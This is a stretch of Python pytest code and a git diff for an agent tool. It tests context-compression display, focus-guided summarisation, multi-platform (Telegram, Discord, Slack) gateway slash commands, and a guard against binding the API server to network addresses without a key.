def test_shows_compression_info(self, tmp_path, capsys):
|
||||
"""When compressions have occurred, that info is shown."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub(compression_count=2)
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Compressions this session: 2" in out
|
||||
|
||||
def test_shows_auto_compress_threshold(self, tmp_path, capsys):
|
||||
"""Auto-compress threshold and remaining tokens are shown."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub(threshold_tokens=160000)
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Auto-compress at" in out
|
||||
assert "remaining" in out
|
||||
|
||||
def test_detects_compaction_summaries(self, tmp_path, capsys):
|
||||
"""Messages containing compaction summary markers are identified."""
|
||||
from agent.context_compressor import SUMMARY_PREFIX
|
||||
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub()
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "assistant", "content": f"{SUMMARY_PREFIX}\n## Goal\nBuild a feature."},
|
||||
{"role": "user", "content": "Continue from the summary."},
|
||||
]
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Compaction summaries" in out
|
||||
|
||||
def test_bar_rendering(self, tmp_path, capsys):
|
||||
"""The progress bar renders block characters."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub()
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "user", "content": "x" * 1000},
|
||||
]
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
# Should contain block characters from the bar
|
||||
assert "█" in out or "░" in out
|
||||
|
||||
def test_identifies_skills_section(self, tmp_path, capsys):
|
||||
"""When system prompt contains skills marker, it's broken out."""
|
||||
system_prompt = (
|
||||
"You are Hermes.\n\n"
|
||||
"## Skills (mandatory)\n"
|
||||
"Before replying, scan the skills below.\n"
|
||||
"<available_skills>\n skill1: does something\n</available_skills>\n\n"
|
||||
"Conversation started: Friday, April 10, 2026"
|
||||
)
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub(system_prompt=system_prompt)
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Skills index" in out
|
||||
|
||||
def test_identifies_context_files_section(self, tmp_path, capsys):
|
||||
"""When system prompt contains context files marker, it's broken out."""
|
||||
system_prompt = (
|
||||
"You are Hermes.\n\n"
|
||||
"# Project Context\n\n"
|
||||
"## AGENTS.md\nDevelopment guide content here...\n\n"
|
||||
"Conversation started: Friday, April 10, 2026"
|
||||
)
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
cli_obj.agent = _make_agent_stub(system_prompt=system_prompt)
|
||||
cli_obj.conversation_history = []
|
||||
|
||||
cli_obj._show_context_breakdown()
|
||||
out = capsys.readouterr().out
|
||||
assert "Context files" in out
|
||||
|
||||
|
||||
class TestCompressFocusTopic:
|
||||
"""Tests for /compress <focus> — guided compression."""
|
||||
|
||||
def test_focus_topic_extracted(self, tmp_path, capsys):
|
||||
"""Focus topic is extracted from the command string."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
agent = _make_agent_stub()
|
||||
agent.compression_enabled = True
|
||||
agent._cached_system_prompt = "You are Hermes."
|
||||
# Make compress return the messages unchanged for testing
|
||||
agent._compress_context = MagicMock(return_value=(
|
||||
[{"role": "user", "content": "test"}],
|
||||
"system prompt",
|
||||
))
|
||||
cli_obj.agent = agent
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "user", "content": "a"},
|
||||
{"role": "assistant", "content": "b"},
|
||||
{"role": "user", "content": "c"},
|
||||
{"role": "assistant", "content": "d"},
|
||||
]
|
||||
|
||||
cli_obj._manual_compress("/compress database schema")
|
||||
out = capsys.readouterr().out
|
||||
assert 'focus: "database schema"' in out
|
||||
|
||||
# Verify the focus_topic was passed through
|
||||
agent._compress_context.assert_called_once()
|
||||
call_kwargs = agent._compress_context.call_args
|
||||
assert call_kwargs.kwargs.get("focus_topic") == "database schema"
|
||||
|
||||
def test_no_focus_topic_when_bare_command(self, tmp_path, capsys):
|
||||
"""When no focus topic is provided, None is passed."""
|
||||
cli_obj = _make_cli(tmp_path)
|
||||
agent = _make_agent_stub()
|
||||
agent.compression_enabled = True
|
||||
agent._cached_system_prompt = "You are Hermes."
|
||||
agent._compress_context = MagicMock(return_value=(
|
||||
[{"role": "user", "content": "test"}],
|
||||
"system prompt",
|
||||
))
|
||||
cli_obj.agent = agent
|
||||
cli_obj.conversation_history = [
|
||||
{"role": "user", "content": "a"},
|
||||
{"role": "assistant", "content": "b"},
|
||||
{"role": "user", "content": "c"},
|
||||
{"role": "assistant", "content": "d"},
|
||||
]
|
||||
|
||||
cli_obj._manual_compress("/compress")
|
||||
agent._compress_context.assert_called_once()
|
||||
call_kwargs = agent._compress_context.call_args
|
||||
assert call_kwargs.kwargs.get("focus_topic") is None
|
||||
|
||||
def test_focus_topic_in_generate_summary_prompt(self):
|
||||
"""Focus topic is injected into the LLM prompt for summarization."""
|
||||
from agent.context_compressor import ContextCompressor
|
||||
|
||||
compressor = ContextCompressor.__new__(ContextCompressor)
|
||||
compressor.protect_first_n = 2
|
||||
compressor.protect_last_n = 5
|
||||
compressor.tail_token_budget = 20000
|
||||
compressor.context_length = 200000
|
||||
compressor.threshold_percent = 0.80
|
||||
compressor.threshold_tokens = 160000
|
||||
compressor.max_summary_tokens = 10000
|
||||
compressor.quiet_mode = True
|
||||
compressor.compression_count = 0
|
||||
compressor.last_prompt_tokens = 0
|
||||
compressor._previous_summary = None
|
||||
compressor._summary_failure_cooldown_until = 0.0
|
||||
compressor.summary_model = None
|
||||
|
||||
turns = [
|
||||
{"role": "user", "content": "Tell me about the database schema"},
|
||||
{"role": "assistant", "content": "The schema has tables: users, orders, products."},
|
||||
]
|
||||
|
||||
# Mock call_llm to capture the prompt
|
||||
captured_prompt = {}
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
captured_prompt["messages"] = kwargs["messages"]
|
||||
resp = MagicMock()
|
||||
resp.choices = [MagicMock()]
|
||||
resp.choices[0].message.content = "## Goal\nUnderstand DB schema."
|
||||
return resp
|
||||
|
||||
with patch("agent.context_compressor.call_llm", mock_call_llm):
|
||||
result = compressor._generate_summary(turns, focus_topic="database schema")
|
||||
|
||||
assert result is not None
|
||||
prompt_text = captured_prompt["messages"][0]["content"]
|
||||
assert 'FOCUS TOPIC: "database schema"' in prompt_text
|
||||
assert "PRIORITISE" in prompt_text
|
||||
|
||||
def test_no_focus_topic_no_injection(self):
|
||||
"""Without focus_topic, the prompt doesn't contain focus guidance."""
|
||||
from agent.context_compressor import ContextCompressor
|
||||
|
||||
compressor = ContextCompressor.__new__(ContextCompressor)
|
||||
compressor.protect_first_n = 2
|
||||
compressor.protect_last_n = 5
|
||||
compressor.tail_token_budget = 20000
|
||||
compressor.context_length = 200000
|
||||
compressor.threshold_percent = 0.80
|
||||
compressor.threshold_tokens = 160000
|
||||
compressor.max_summary_tokens = 10000
|
||||
compressor.quiet_mode = True
|
||||
compressor.compression_count = 0
|
||||
compressor.last_prompt_tokens = 0
|
||||
compressor._previous_summary = None
|
||||
compressor._summary_failure_cooldown_until = 0.0
|
||||
compressor.summary_model = None
|
||||
|
||||
turns = [
|
||||
{"role": "user", "content": "Hello"},
|
||||
{"role": "assistant", "content": "Hi"},
|
||||
]
|
||||
|
||||
captured_prompt = {}
|
||||
|
||||
def mock_call_llm(**kwargs):
|
||||
captured_prompt["messages"] = kwargs["messages"]
|
||||
resp = MagicMock()
|
||||
resp.choices = [MagicMock()]
|
||||
resp.choices[0].message.content = "## Goal\nGreeting."
|
||||
return resp
|
||||
|
||||
with patch("agent.context_compressor.call_llm", mock_call_llm):
|
||||
result = compressor._generate_summary(turns)
|
||||
|
||||
prompt_text = captured_prompt["messages"][0]["content"]
|
||||
assert "FOCUS TOPIC" not in prompt_text
|
||||
+151
-59
@@ -1,4 +1,4 @@
|
||||
"""Shared fixtures for Telegram gateway e2e tests.
|
||||
"""Shared fixtures for gateway e2e tests (Telegram, Discord).
|
||||
|
||||
These tests exercise the full async message flow:
|
||||
adapter.handle_message(event)
|
||||
@@ -14,19 +14,22 @@ import sys
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.config import GatewayConfig, Platform, PlatformConfig
|
||||
from gateway.platforms.base import MessageEvent, SendResult
|
||||
from gateway.session import SessionEntry, SessionSource, build_session_key
|
||||
|
||||
|
||||
#Ensure telegram module is available (mock it if not installed)
|
||||
# Platform library mocks
|
||||
|
||||
# Ensure telegram module is available (mock it if not installed)
|
||||
def _ensure_telegram_mock():
|
||||
"""Install mock telegram modules so TelegramAdapter can be imported."""
|
||||
if "telegram" in sys.modules and hasattr(sys.modules["telegram"], "__file__"):
|
||||
return # Real library installed
|
||||
return # Real library installed
|
||||
|
||||
telegram_mod = MagicMock()
|
||||
telegram_mod.Update = MagicMock()
|
||||
@@ -51,24 +54,118 @@ def _ensure_telegram_mock():
|
||||
sys.modules.setdefault(name, telegram_mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
# Ensure discord module is available (mock it if not installed)
|
||||
def _ensure_discord_mock():
|
||||
"""Install mock discord modules so DiscordAdapter can be imported."""
|
||||
if "discord" in sys.modules and hasattr(sys.modules["discord"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
discord_mod = MagicMock()
|
||||
discord_mod.Intents.default.return_value = MagicMock()
|
||||
discord_mod.DMChannel = type("DMChannel", (), {})
|
||||
discord_mod.Thread = type("Thread", (), {})
|
||||
discord_mod.ForumChannel = type("ForumChannel", (), {})
|
||||
discord_mod.Interaction = object
|
||||
discord_mod.app_commands = SimpleNamespace(
|
||||
describe=lambda **kwargs: (lambda fn: fn),
|
||||
choices=lambda **kwargs: (lambda fn: fn),
|
||||
Choice=lambda **kwargs: SimpleNamespace(**kwargs),
|
||||
)
|
||||
discord_mod.opus.is_loaded.return_value = True
|
||||
|
||||
ext_mod = MagicMock()
|
||||
commands_mod = MagicMock()
|
||||
commands_mod.Bot = MagicMock
|
||||
ext_mod.commands = commands_mod
|
||||
|
||||
sys.modules.setdefault("discord", discord_mod)
|
||||
sys.modules.setdefault("discord.ext", ext_mod)
|
||||
sys.modules.setdefault("discord.ext.commands", commands_mod)
|
||||
sys.modules.setdefault("discord.opus", discord_mod.opus)
|
||||
|
||||
|
||||
def _ensure_slack_mock():
|
||||
"""Install mock slack modules so SlackAdapter can be imported."""
|
||||
if "slack_bolt" in sys.modules and hasattr(sys.modules["slack_bolt"], "__file__"):
|
||||
return # Real library installed
|
||||
|
||||
slack_bolt = MagicMock()
|
||||
slack_bolt.async_app.AsyncApp = MagicMock
|
||||
slack_bolt.adapter.socket_mode.async_handler.AsyncSocketModeHandler = MagicMock
|
||||
|
||||
slack_sdk = MagicMock()
|
||||
slack_sdk.web.async_client.AsyncWebClient = MagicMock
|
||||
|
||||
for name, mod in [
|
||||
("slack_bolt", slack_bolt),
|
||||
("slack_bolt.async_app", slack_bolt.async_app),
|
||||
("slack_bolt.adapter", slack_bolt.adapter),
|
||||
("slack_bolt.adapter.socket_mode", slack_bolt.adapter.socket_mode),
|
||||
("slack_bolt.adapter.socket_mode.async_handler", slack_bolt.adapter.socket_mode.async_handler),
|
||||
("slack_sdk", slack_sdk),
|
||||
("slack_sdk.web", slack_sdk.web),
|
||||
("slack_sdk.web.async_client", slack_sdk.web.async_client),
|
||||
]:
|
||||
sys.modules.setdefault(name, mod)
|
||||
|
||||
|
||||
_ensure_telegram_mock()
|
||||
_ensure_discord_mock()
|
||||
_ensure_slack_mock()
|
||||
|
||||
from gateway.platforms.discord import DiscordAdapter # noqa: E402
|
||||
from gateway.platforms.telegram import TelegramAdapter # noqa: E402
|
||||
|
||||
import gateway.platforms.slack as _slack_mod # noqa: E402
|
||||
_slack_mod.SLACK_AVAILABLE = True
|
||||
from gateway.platforms.slack import SlackAdapter # noqa: E402
|
||||
|
||||
#GatewayRunner factory (based on tests/gateway/test_status_command.py)
|
||||
|
||||
def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
# Platform-generic factories
|
||||
|
||||
def make_source(platform: Platform, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=platform,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(platform: Platform, source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source(platform)
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=platform,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(platform: Platform, text: str = "/help", chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(platform, chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_runner(platform: Platform, session_entry: SessionEntry = None) -> "GatewayRunner":
|
||||
"""Create a GatewayRunner with mocked internals for e2e testing.
|
||||
|
||||
Skips __init__ to avoid filesystem/network side effects.
|
||||
All command-dispatch dependencies are wired manually.
|
||||
"""
|
||||
from gateway.run import GatewayRunner
|
||||
|
||||
if session_entry is None:
|
||||
session_entry = make_session_entry(platform)
|
||||
|
||||
runner = object.__new__(GatewayRunner)
|
||||
runner.config = GatewayConfig(
|
||||
platforms={Platform.TELEGRAM: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
platforms={platform: PlatformConfig(enabled=True, token="e2e-test-token")}
|
||||
)
|
||||
runner.adapters = {}
|
||||
runner._voice_mode = {}
|
||||
@@ -99,7 +196,6 @@ def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
runner._capture_gateway_honcho_if_configured = lambda *a, **kw: None
|
||||
runner._emit_gateway_run_progress = AsyncMock()
|
||||
|
||||
# Pairing store (used by authorization rejection path)
|
||||
runner.pairing_store = MagicMock()
|
||||
runner.pairing_store._is_rate_limited = MagicMock(return_value=False)
|
||||
runner.pairing_store.generate_code = MagicMock(return_value="ABC123")
|
||||
@@ -107,67 +203,63 @@ def make_runner(session_entry: SessionEntry) -> "GatewayRunner":
|
||||
return runner
|
||||
|
||||
|
||||
#TelegramAdapter factory
|
||||
def make_adapter(platform: Platform, runner=None):
|
||||
"""Create a platform adapter wired to *runner*, with send methods mocked."""
|
||||
if runner is None:
|
||||
runner = make_runner(platform)
|
||||
|
||||
def make_adapter(runner) -> TelegramAdapter:
|
||||
"""Create a TelegramAdapter wired to *runner*, with send methods mocked.
|
||||
|
||||
connect() is NOT called — no polling, no token lock, no real HTTP.
|
||||
"""
|
||||
config = PlatformConfig(enabled=True, token="e2e-test-token")
|
||||
adapter = TelegramAdapter(config)
|
||||
|
||||
# Mock outbound methods so tests can capture what was sent
|
||||
if platform == Platform.DISCORD:
|
||||
with patch.object(DiscordAdapter, "_load_participated_threads", return_value=set()):
|
||||
adapter = DiscordAdapter(config)
|
||||
platform_key = Platform.DISCORD
|
||||
elif platform == Platform.SLACK:
|
||||
adapter = SlackAdapter(config)
|
||||
platform_key = Platform.SLACK
|
||||
else:
|
||||
adapter = TelegramAdapter(config)
|
||||
platform_key = Platform.TELEGRAM
|
||||
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=True, message_id="e2e-resp-1"))
|
||||
adapter.send_typing = AsyncMock()
|
||||
|
||||
# Wire adapter ↔ runner
|
||||
adapter.set_message_handler(runner._handle_message)
|
||||
runner.adapters[Platform.TELEGRAM] = adapter
|
||||
runner.adapters[platform_key] = adapter
|
||||
|
||||
return adapter
|
||||
|
||||
|
||||
#Helpers
|
||||
|
||||
def make_source(chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> SessionSource:
|
||||
return SessionSource(
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_id=chat_id,
|
||||
user_id=user_id,
|
||||
user_name="e2e_tester",
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
def make_event(text: str, chat_id: str = "e2e-chat-1", user_id: str = "e2e-user-1") -> MessageEvent:
|
||||
return MessageEvent(
|
||||
text=text,
|
||||
source=make_source(chat_id, user_id),
|
||||
message_id=f"msg-{uuid.uuid4().hex[:8]}",
|
||||
)
|
||||
|
||||
|
||||
def make_session_entry(source: SessionSource = None) -> SessionEntry:
|
||||
source = source or make_source()
|
||||
return SessionEntry(
|
||||
session_key=build_session_key(source),
|
||||
session_id=f"sess-{uuid.uuid4().hex[:8]}",
|
||||
created_at=datetime.now(),
|
||||
updated_at=datetime.now(),
|
||||
platform=Platform.TELEGRAM,
|
||||
chat_type="dm",
|
||||
)
|
||||
|
||||
|
||||
async def send_and_capture(adapter: TelegramAdapter, text: str, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock.
|
||||
|
||||
Drives: adapter.handle_message → background task → runner dispatch → adapter.send.
|
||||
"""
|
||||
event = make_event(text, **event_kwargs)
|
||||
async def send_and_capture(adapter, text: str, platform: Platform, **event_kwargs) -> AsyncMock:
|
||||
"""Send a message through the full e2e flow and return the send mock."""
|
||||
event = make_event(platform, text, **event_kwargs)
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
# Let the background task complete
|
||||
await asyncio.sleep(0.3)
|
||||
return adapter.send
|
||||
|
||||
|
||||
# Parametrized fixtures for platform-generic tests
|
||||
@pytest.fixture(params=[Platform.TELEGRAM, Platform.DISCORD, Platform.SLACK], ids=["telegram", "discord", "slack"])
|
||||
def platform(request):
|
||||
return request.param
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def source(platform):
|
||||
return make_source(platform)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(platform, source):
|
||||
return make_session_entry(platform, source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(platform, session_entry):
|
||||
return make_runner(platform, session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(platform, runner):
|
||||
return make_adapter(platform, runner)
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
"""E2E tests for Telegram gateway slash commands.
|
||||
"""E2E tests for gateway slash commands (Telegram, Discord).
|
||||
|
||||
Each test drives a message through the full async pipeline:
|
||||
adapter.handle_message(event)
|
||||
@@ -7,6 +7,7 @@ Each test drives a message through the full async pipeline:
|
||||
→ adapter.send() (captured for assertions)
|
||||
|
||||
No LLM involved — only gateway-level commands are tested.
|
||||
Tests are parametrized over platforms via the ``platform`` fixture in conftest.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
@@ -15,46 +16,15 @@ from unittest.mock import AsyncMock
|
||||
import pytest
|
||||
|
||||
from gateway.platforms.base import SendResult
|
||||
from tests.e2e.conftest import (
|
||||
make_adapter,
|
||||
make_event,
|
||||
make_runner,
|
||||
make_session_entry,
|
||||
make_source,
|
||||
send_and_capture,
|
||||
)
|
||||
from tests.e2e.conftest import make_event, send_and_capture
|
||||
|
||||
|
||||
#Fixtures
|
||||
|
||||
@pytest.fixture()
|
||||
def source():
|
||||
return make_source()
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def session_entry(source):
|
||||
return make_session_entry(source)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def runner(session_entry):
|
||||
return make_runner(session_entry)
|
||||
|
||||
|
||||
@pytest.fixture()
|
||||
def adapter(runner):
|
||||
return make_adapter(runner)
|
||||
|
||||
|
||||
#Tests
|
||||
|
||||
class TestTelegramSlashCommands:
|
||||
class TestSlashCommands:
|
||||
"""Gateway slash commands dispatched through the full adapter pipeline."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_help_returns_command_list(self, adapter):
|
||||
send = await send_and_capture(adapter, "/help")
|
||||
async def test_help_returns_command_list(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/help", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -62,24 +32,23 @@ class TestTelegramSlashCommands:
|
||||
assert "/status" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_status_shows_session_info(self, adapter):
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
async def test_status_shows_session_info(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/status", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Status output includes session metadata
|
||||
assert "session" in response_text.lower() or "Session" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_resets_session(self, adapter, runner):
|
||||
send = await send_and_capture(adapter, "/new")
|
||||
async def test_new_resets_session(self, adapter, runner, platform):
|
||||
send = await send_and_capture(adapter, "/new", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_stop_when_no_agent_running(self, adapter):
|
||||
send = await send_and_capture(adapter, "/stop")
|
||||
async def test_stop_when_no_agent_running(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/stop", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -87,8 +56,8 @@ class TestTelegramSlashCommands:
|
||||
assert "no" in response_lower or "stop" in response_lower or "not running" in response_lower
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_commands_shows_listing(self, adapter):
|
||||
send = await send_and_capture(adapter, "/commands")
|
||||
async def test_commands_shows_listing(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/commands", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -96,25 +65,25 @@ class TestTelegramSlashCommands:
|
||||
assert "/" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_sequential_commands_share_session(self, adapter):
|
||||
async def test_sequential_commands_share_session(self, adapter, platform):
|
||||
"""Two commands from the same chat_id should both succeed."""
|
||||
send_help = await send_and_capture(adapter, "/help")
|
||||
send_help = await send_and_capture(adapter, "/help", platform)
|
||||
send_help.assert_called_once()
|
||||
|
||||
send_status = await send_and_capture(adapter, "/status")
|
||||
send_status = await send_and_capture(adapter, "/status", platform)
|
||||
send_status.assert_called_once()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_provider_shows_current_provider(self, adapter):
|
||||
send = await send_and_capture(adapter, "/provider")
|
||||
async def test_provider_shows_current_provider(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/provider", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "provider" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_verbose_responds(self, adapter):
|
||||
send = await send_and_capture(adapter, "/verbose")
|
||||
async def test_verbose_responds(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/verbose", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
@@ -122,42 +91,50 @@ class TestTelegramSlashCommands:
|
||||
assert "verbose" in response_text.lower() or "tool_progress" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_personality_lists_options(self, adapter):
|
||||
send = await send_and_capture(adapter, "/personality")
|
||||
async def test_personality_lists_options(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/personality", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "personalit" in response_text.lower() # matches "personality" or "personalities"
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_yolo_toggles_mode(self, adapter):
|
||||
send = await send_and_capture(adapter, "/yolo")
|
||||
async def test_yolo_toggles_mode(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/yolo", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "yolo" in response_text.lower()
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_compress_command(self, adapter, platform):
|
||||
send = await send_and_capture(adapter, "/compress", platform)
|
||||
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
assert "compress" in response_text.lower() or "context" in response_text.lower()
|
||||
|
||||
|
||||
class TestSessionLifecycle:
|
||||
"""Verify session state changes across command sequences."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry):
|
||||
async def test_new_then_status_reflects_reset(self, adapter, runner, session_entry, platform):
|
||||
"""After /new, /status should report the fresh session."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
runner.session_store.reset_session.assert_called_once()
|
||||
|
||||
send = await send_and_capture(adapter, "/status")
|
||||
send = await send_and_capture(adapter, "/status", platform)
|
||||
send.assert_called_once()
|
||||
response_text = send.call_args[1].get("content") or send.call_args[0][1]
|
||||
# Session ID from the entry should appear in the status output
|
||||
assert session_entry.session_id[:8] in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_new_is_idempotent(self, adapter, runner):
|
||||
async def test_new_is_idempotent(self, adapter, runner, platform):
|
||||
"""/new called twice should not crash."""
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new")
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
await send_and_capture(adapter, "/new", platform)
|
||||
assert runner.session_store.reset_session.call_count == 2
|
||||
|
||||
|
||||
@@ -165,11 +142,11 @@ class TestAuthorization:
|
||||
"""Verify the pipeline handles unauthorized users."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner):
|
||||
async def test_unauthorized_user_gets_pairing_response(self, adapter, runner, platform):
|
||||
"""Unauthorized DM should trigger pairing code, not a command response."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -181,11 +158,11 @@ class TestAuthorization:
|
||||
assert "recognize" in response_text.lower() or "pair" in response_text.lower() or "ABC123" in response_text
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner):
|
||||
async def test_unauthorized_user_does_not_get_help(self, adapter, runner, platform):
|
||||
"""Unauthorized user should NOT see the help command output."""
|
||||
runner._is_user_authorized = lambda _source: False
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
adapter.send.reset_mock()
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -200,12 +177,12 @@ class TestSendFailureResilience:
|
||||
"""Verify the pipeline handles send failures gracefully."""
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter):
|
||||
async def test_send_failure_does_not_crash_pipeline(self, adapter, platform):
|
||||
"""If send() returns failure, the pipeline should not raise."""
|
||||
adapter.send = AsyncMock(return_value=SendResult(success=False, error="network timeout"))
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
adapter.set_message_handler(adapter._message_handler) # re-wire with same handler
|
||||
|
||||
event = make_event("/help")
|
||||
event = make_event(platform, "/help")
|
||||
# Should not raise — pipeline handles send failures internally
|
||||
await adapter.handle_message(event)
|
||||
await asyncio.sleep(0.3)
|
||||
@@ -0,0 +1,132 @@
|
||||
"""Tests for the API server bind-address startup guard.
|
||||
|
||||
Validates that is_network_accessible() correctly classifies addresses and
|
||||
that connect() refuses to start on non-loopback without API_SERVER_KEY.
|
||||
"""
|
||||
|
||||
import socket
|
||||
from unittest.mock import AsyncMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from gateway.config import PlatformConfig
|
||||
from gateway.platforms.api_server import APIServerAdapter
|
||||
from gateway.platforms.base import is_network_accessible
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Unit tests: is_network_accessible()
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class TestIsNetworkAccessible:
|
||||
"""Direct tests for the address classification helper."""
|
||||
|
||||
# -- Loopback (safe, should return False) --
|
||||
|
||||
def test_ipv4_loopback(self):
|
||||
assert is_network_accessible("127.0.0.1") is False
|
||||
|
||||
def test_ipv6_loopback(self):
|
||||
assert is_network_accessible("::1") is False
|
||||
|
||||
def test_ipv4_mapped_loopback(self):
|
||||
# ::ffff:127.0.0.1 — Python's is_loopback returns False for mapped
|
||||
# addresses; the helper must unwrap and check ipv4_mapped.
|
||||
assert is_network_accessible("::ffff:127.0.0.1") is False
|
||||
|
||||
